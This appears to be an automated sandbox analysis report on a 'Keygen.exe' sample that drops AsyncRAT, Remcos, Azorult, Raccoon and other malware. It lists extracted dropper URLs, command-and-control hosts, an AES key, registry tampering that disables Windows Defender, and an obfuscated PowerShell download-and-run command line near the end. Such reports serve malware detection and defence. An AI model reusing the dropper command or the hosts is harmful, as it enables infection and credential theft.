asyncrat | 390d7472201e8ea9bdc6c7fa2b4ab1f6faca02071f1f997037cc5f52759a9cb6

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

max time kernel
1805s
max time network
1820s
platform
windows10_x64
resource
win10v20201028
submitted
19-11-2020 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Keygen.exe

Score

10^/10

asyncrat azorult modiloader oski raccoon remcos 5e4db353b88c002ba6466c06437973619aad03b3 discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes

url4cnc
https://telete.in/brikitiki

rc4.plain

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
anti_detection
false
autorun
false
bdos
false
delay
Default
host
agentttt.ac.ug,agentpurple.ac.ug
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6970
version
0.5.7B

aes.plain

Extracted

Family

remcos

taenaia.ac.ug:6969

agentpapple.ac.ug:6969

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 10 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral12/memory/2180-250-0x000000000040616E-mapping.dmp	disable_win_def
behavioral12/memory/2180-249-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral12/memory/4872-272-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
behavioral12/memory/4872-273-0x0000000000403BEE-mapping.dmp	disable_win_def
C:\Windows\temp\mmfwhmpi.exe	disable_win_def
C:\Windows\Temp\mmfwhmpi.exe	disable_win_def
behavioral12/memory/3976-670-0x000000000040616E-mapping.dmp	disable_win_def
behavioral12/memory/5476-696-0x0000000000403BEE-mapping.dmp	disable_win_def
C:\Windows\temp\ipjk2yso.exe	disable_win_def
C:\Windows\Temp\ipjk2yso.exe	disable_win_def

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral12/memory/4972-236-0x000000000040C76E-mapping.dmp	asyncrat
behavioral12/memory/4972-233-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral12/memory/5832-650-0x000000000040C76E-mapping.dmp	asyncrat

ModiLoader First Stage 2 IoCs

Processes:

resource	yara_rule
behavioral12/memory/4724-302-0x00000000041C0000-0x000000000421C000-memory.dmp	modiloader_stage1
behavioral12/memory/5668-674-0x0000000002A80000-0x0000000002ADC000-memory.dmp	modiloader_stage1

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

10 2224 powershell.exe
12 1752 powershell.exe
15 2224 powershell.exe
16 1752 powershell.exe
18 4536 powershell.exe
20 4536 powershell.exe
Downloads MZ/PE file

flow	pid	process
10	2224	powershell.exe
12	1752	powershell.exe
15	2224	powershell.exe
16	1752	powershell.exe
18	4536	powershell.exe
20	4536	powershell.exe

Executes dropped EXE 35 IoCs

Processes:

Keygen.exeomx.exexvb.exeFGbfttrev.exeFDvbcgfert.exeomx.exeFGbfttrev.exeFDvbcgfert.exeywq.exeFGbfttrev.exeFGbfttrev.exeWbzfV6CULA.exeys0nsVDvlk.exek7OXQaTnHC.exer9bcktZEdK.exeazchgftrq.exeWbzfV6CULA.exexvb.exek7OXQaTnHC.exer9bcktZEdK.exer9bcktZEdK.exemmfwhmpi.exeozchgftrq.exeazchgftrq.exeowIRnLSEZY.exetr1M5TzQok.exeZipHA1oS1L.exeviu1oJ97BK.exeowIRnLSEZY.exeZipHA1oS1L.exeZipHA1oS1L.exeviu1oJ97BK.exeozchgftrq.exeviu1oJ97BK.exeipjk2yso.exe

pid	process
2600	Keygen.exe
5072	omx.exe
4132	xvb.exe
2528	FGbfttrev.exe
476	FDvbcgfert.exe
4440	omx.exe
3884	FGbfttrev.exe
2440	FDvbcgfert.exe
4824	ywq.exe
5080	FGbfttrev.exe
5052	FGbfttrev.exe
4244	WbzfV6CULA.exe
4724	ys0nsVDvlk.exe
5044	k7OXQaTnHC.exe
4848	r9bcktZEdK.exe
4412	azchgftrq.exe
4972	WbzfV6CULA.exe
4204	xvb.exe
2180	k7OXQaTnHC.exe
4808	r9bcktZEdK.exe
4872	r9bcktZEdK.exe
1872	mmfwhmpi.exe
5372	ozchgftrq.exe
3736	azchgftrq.exe
6116	owIRnLSEZY.exe
5668	tr1M5TzQok.exe
2616	ZipHA1oS1L.exe
5496	viu1oJ97BK.exe
5832	owIRnLSEZY.exe
4304	ZipHA1oS1L.exe
3976	ZipHA1oS1L.exe
4160	viu1oJ97BK.exe
1028	ozchgftrq.exe
5476	viu1oJ97BK.exe
4836	ipjk2yso.exe

Loads dropped DLL 13 IoCs

Processes:

FDvbcgfert.exeomx.exexvb.exeozchgftrq.exe

pid	process
2440	FDvbcgfert.exe
2440	FDvbcgfert.exe
2440	FDvbcgfert.exe
4440	omx.exe
4440	omx.exe
4440	omx.exe
4440	omx.exe
4440	omx.exe
4440	omx.exe
4204	xvb.exe
1028	ozchgftrq.exe
1028	ozchgftrq.exe
1028	ozchgftrq.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

r9bcktZEdK.exeviu1oJ97BK.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	r9bcktZEdK.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	r9bcktZEdK.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	viu1oJ97BK.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ys0nsVDvlk.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zsle = "C:\\Users\\Admin\\AppData\\Local\\elsZ.url"	ys0nsVDvlk.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 2 IoCs

Processes:

omx.exexvb.exe

description	ioc	process
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	omx.exe
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	xvb.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

omx.exeFGbfttrev.exeFDvbcgfert.exeFGbfttrev.exe

pid process

4440 omx.exe
4440 omx.exe
3884 FGbfttrev.exe
3884 FGbfttrev.exe
2440 FDvbcgfert.exe
2440 FDvbcgfert.exe
5052 FGbfttrev.exe
5052 FGbfttrev.exe

pid	process
4440	omx.exe
4440	omx.exe
3884	FGbfttrev.exe
3884	FGbfttrev.exe
2440	FDvbcgfert.exe
2440	FDvbcgfert.exe
5052	FGbfttrev.exe
5052	FGbfttrev.exe

Suspicious use of SetThreadContext 14 IoCs

Processes:

omx.exeFGbfttrev.exeFDvbcgfert.exeFGbfttrev.exeWbzfV6CULA.exexvb.exek7OXQaTnHC.exer9bcktZEdK.exeazchgftrq.exeowIRnLSEZY.exeZipHA1oS1L.exeozchgftrq.exeviu1oJ97BK.exetr1M5TzQok.exe

description	pid	process	target process
PID 5072 set thread context of 4440	5072	omx.exe	omx.exe
PID 2528 set thread context of 3884	2528	FGbfttrev.exe	FGbfttrev.exe
PID 476 set thread context of 2440	476	FDvbcgfert.exe	FDvbcgfert.exe
PID 5080 set thread context of 5052	5080	FGbfttrev.exe	FGbfttrev.exe
PID 4244 set thread context of 4972	4244	WbzfV6CULA.exe	WbzfV6CULA.exe
PID 4132 set thread context of 4204	4132	xvb.exe	xvb.exe
PID 5044 set thread context of 2180	5044	k7OXQaTnHC.exe	k7OXQaTnHC.exe
PID 4848 set thread context of 4872	4848	r9bcktZEdK.exe	r9bcktZEdK.exe
PID 4412 set thread context of 3736	4412	azchgftrq.exe	azchgftrq.exe
PID 6116 set thread context of 5832	6116	owIRnLSEZY.exe	owIRnLSEZY.exe
PID 2616 set thread context of 3976	2616	ZipHA1oS1L.exe	ZipHA1oS1L.exe
PID 5372 set thread context of 1028	5372	ozchgftrq.exe	ozchgftrq.exe
PID 5496 set thread context of 5476	5496	viu1oJ97BK.exe	viu1oJ97BK.exe
PID 5668 set thread context of 2536	5668	tr1M5TzQok.exe	ieinstal.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FDvbcgfert.exeozchgftrq.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FDvbcgfert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ozchgftrq.exe

Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

4948 timeout.exe
4264 timeout.exe
2012 timeout.exe
2468 timeout.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4188 taskkill.exe
4344 taskkill.exe
5012 taskkill.exe
5440 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings cmd.exe
Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

4320 reg.exe
1872 reg.exe
2168 reg.exe

pid	process
4948	timeout.exe
4264	timeout.exe
2012	timeout.exe
2468	timeout.exe

pid	process
4188	taskkill.exe
4344	taskkill.exe
5012	taskkill.exe
5440	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe

pid	process
4320	reg.exe
1872	reg.exe
2168	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

ys0nsVDvlk.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	ys0nsVDvlk.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	ys0nsVDvlk.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exek7OXQaTnHC.exe

pid	process
3612	powershell.exe
2224	powershell.exe
1752	powershell.exe
4104	powershell.exe
2224	powershell.exe
3612	powershell.exe
3612	powershell.exe
1752	powershell.exe
4104	powershell.exe
3612	powershell.exe
2224	powershell.exe
1752	powershell.exe
1752	powershell.exe
4104	powershell.exe
4104	powershell.exe
4536	powershell.exe
4536	powershell.exe
4736	powershell.exe
4736	powershell.exe
4536	powershell.exe
4736	powershell.exe
4536	powershell.exe
4736	powershell.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

omx.exeFGbfttrev.exeFDvbcgfert.exeFGbfttrev.exe

pid process

5072 omx.exe
2528 FGbfttrev.exe
476 FDvbcgfert.exe
5080 FGbfttrev.exe

pid	process
5072	omx.exe
2528	FGbfttrev.exe
476	FDvbcgfert.exe
5080	FGbfttrev.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exexvb.exeWbzfV6CULA.exek7OXQaTnHC.exek7OXQaTnHC.exer9bcktZEdK.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3612	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	4536	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	4188	taskkill.exe
Token: SeDebugPrivilege	4132	xvb.exe
Token: SeDebugPrivilege	4244	WbzfV6CULA.exe
Token: SeDebugPrivilege	5044	k7OXQaTnHC.exe
Token: SeDebugPrivilege	2180	k7OXQaTnHC.exe
Token: SeDebugPrivilege	4848	r9bcktZEdK.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeDebugPrivilege	4344	taskkill.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeIncreaseQuotaPrivilege	4252	powershell.exe
Token: SeSecurityPrivilege	4252	powershell.exe
Token: SeTakeOwnershipPrivilege	4252	powershell.exe
Token: SeLoadDriverPrivilege	4252	powershell.exe
Token: SeSystemProfilePrivilege	4252	powershell.exe
Token: SeSystemtimePrivilege	4252	powershell.exe
Token: SeProfSingleProcessPrivilege	4252	powershell.exe
Token: SeIncBasePriorityPrivilege	4252	powershell.exe
Token: SeCreatePagefilePrivilege	4252	powershell.exe
Token: SeBackupPrivilege	4252	powershell.exe
Token: SeRestorePrivilege	4252	powershell.exe
Token: SeShutdownPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeSystemEnvironmentPrivilege	4252	powershell.exe
Token: SeRemoteShutdownPrivilege	4252	powershell.exe
Token: SeUndockPrivilege	4252	powershell.exe
Token: SeManageVolumePrivilege	4252	powershell.exe
Token: 33	4252	powershell.exe
Token: 34	4252	powershell.exe
Token: 35	4252	powershell.exe
Token: 36	4252	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	984	powershell.exe
Token: SeDebugPrivilege	4840	powershell.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeIncreaseQuotaPrivilege	5056	powershell.exe
Token: SeSecurityPrivilege	5056	powershell.exe
Token: SeTakeOwnershipPrivilege	5056	powershell.exe
Token: SeLoadDriverPrivilege	5056	powershell.exe
Token: SeSystemProfilePrivilege	5056	powershell.exe
Token: SeSystemtimePrivilege	5056	powershell.exe
Token: SeProfSingleProcessPrivilege	5056	powershell.exe
Token: SeIncBasePriorityPrivilege	5056	powershell.exe
Token: SeCreatePagefilePrivilege	5056	powershell.exe
Token: SeBackupPrivilege	5056	powershell.exe
Token: SeRestorePrivilege	5056	powershell.exe
Token: SeShutdownPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeSystemEnvironmentPrivilege	5056	powershell.exe
Token: SeRemoteShutdownPrivilege	5056	powershell.exe
Token: SeUndockPrivilege	5056	powershell.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

Keygen.exeomx.exeFGbfttrev.exeFDvbcgfert.exeywq.exeFGbfttrev.exek7OXQaTnHC.exeZipHA1oS1L.exe

pid	process
2600	Keygen.exe
5072	omx.exe
2528	FGbfttrev.exe
476	FDvbcgfert.exe
4824	ywq.exe
5080	FGbfttrev.exe
2180	k7OXQaTnHC.exe
2180	k7OXQaTnHC.exe
3976	ZipHA1oS1L.exe
3976	ZipHA1oS1L.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Keygen.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exeomx.exe

description	pid	process	target process
PID 1096 wrote to memory of 2856	1096	Keygen.exe	cmd.exe
PID 1096 wrote to memory of 2856	1096	Keygen.exe	cmd.exe
PID 1096 wrote to memory of 2856	1096	Keygen.exe	cmd.exe
PID 2856 wrote to memory of 2600	2856	cmd.exe	Keygen.exe
PID 2856 wrote to memory of 2600	2856	cmd.exe	Keygen.exe
PID 2856 wrote to memory of 2600	2856	cmd.exe	Keygen.exe
PID 2856 wrote to memory of 3180	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 3180	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 3180	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 2644	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 2644	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 2644	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 2012	2856	cmd.exe	timeout.exe
PID 2856 wrote to memory of 2012	2856	cmd.exe	timeout.exe
PID 2856 wrote to memory of 2012	2856	cmd.exe	timeout.exe
PID 3180 wrote to memory of 2224	3180	mshta.exe	powershell.exe
PID 3180 wrote to memory of 2224	3180	mshta.exe	powershell.exe
PID 3180 wrote to memory of 2224	3180	mshta.exe	powershell.exe
PID 2644 wrote to memory of 3612	2644	mshta.exe	powershell.exe
PID 2644 wrote to memory of 3612	2644	mshta.exe	powershell.exe
PID 2644 wrote to memory of 3612	2644	mshta.exe	powershell.exe
PID 2856 wrote to memory of 2544	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 2544	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 2544	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 3960	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 3960	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 3960	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 2468	2856	cmd.exe	timeout.exe
PID 2856 wrote to memory of 2468	2856	cmd.exe	timeout.exe
PID 2856 wrote to memory of 2468	2856	cmd.exe	timeout.exe
PID 2544 wrote to memory of 1752	2544	mshta.exe	powershell.exe
PID 2544 wrote to memory of 1752	2544	mshta.exe	powershell.exe
PID 2544 wrote to memory of 1752	2544	mshta.exe	powershell.exe
PID 3960 wrote to memory of 4104	3960	mshta.exe	powershell.exe
PID 3960 wrote to memory of 4104	3960	mshta.exe	powershell.exe
PID 3960 wrote to memory of 4104	3960	mshta.exe	powershell.exe
PID 2856 wrote to memory of 4464	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 4464	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 4464	2856	cmd.exe	mshta.exe
PID 4464 wrote to memory of 4536	4464	mshta.exe	powershell.exe
PID 4464 wrote to memory of 4536	4464	mshta.exe	powershell.exe
PID 4464 wrote to memory of 4536	4464	mshta.exe	powershell.exe
PID 2856 wrote to memory of 4620	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 4620	2856	cmd.exe	mshta.exe
PID 2856 wrote to memory of 4620	2856	cmd.exe	mshta.exe
PID 4620 wrote to memory of 4736	4620	mshta.exe	powershell.exe
PID 4620 wrote to memory of 4736	4620	mshta.exe	powershell.exe
PID 4620 wrote to memory of 4736	4620	mshta.exe	powershell.exe
PID 2224 wrote to memory of 5072	2224	powershell.exe	omx.exe
PID 2224 wrote to memory of 5072	2224	powershell.exe	omx.exe
PID 2224 wrote to memory of 5072	2224	powershell.exe	omx.exe
PID 1752 wrote to memory of 4132	1752	powershell.exe	xvb.exe
PID 1752 wrote to memory of 4132	1752	powershell.exe	xvb.exe
PID 1752 wrote to memory of 4132	1752	powershell.exe	xvb.exe
PID 5072 wrote to memory of 2528	5072	omx.exe	FGbfttrev.exe
PID 5072 wrote to memory of 2528	5072	omx.exe	FGbfttrev.exe
PID 5072 wrote to memory of 2528	5072	omx.exe	FGbfttrev.exe
PID 5072 wrote to memory of 476	5072	omx.exe	FDvbcgfert.exe
PID 5072 wrote to memory of 476	5072	omx.exe	FDvbcgfert.exe
PID 5072 wrote to memory of 476	5072	omx.exe	FDvbcgfert.exe
PID 5072 wrote to memory of 4440	5072	omx.exe	omx.exe
PID 5072 wrote to memory of 4440	5072	omx.exe	omx.exe
PID 5072 wrote to memory of 4440	5072	omx.exe	omx.exe
PID 5072 wrote to memory of 4440	5072	omx.exe	omx.exe

C:\Users\Admin\AppData\Local\Temp\Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8487.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2856

C:\Users\Admin\AppData\Local\Temp\8487.tmp\Keygen.exe
Keygen.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2600

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8487.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:3180

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object 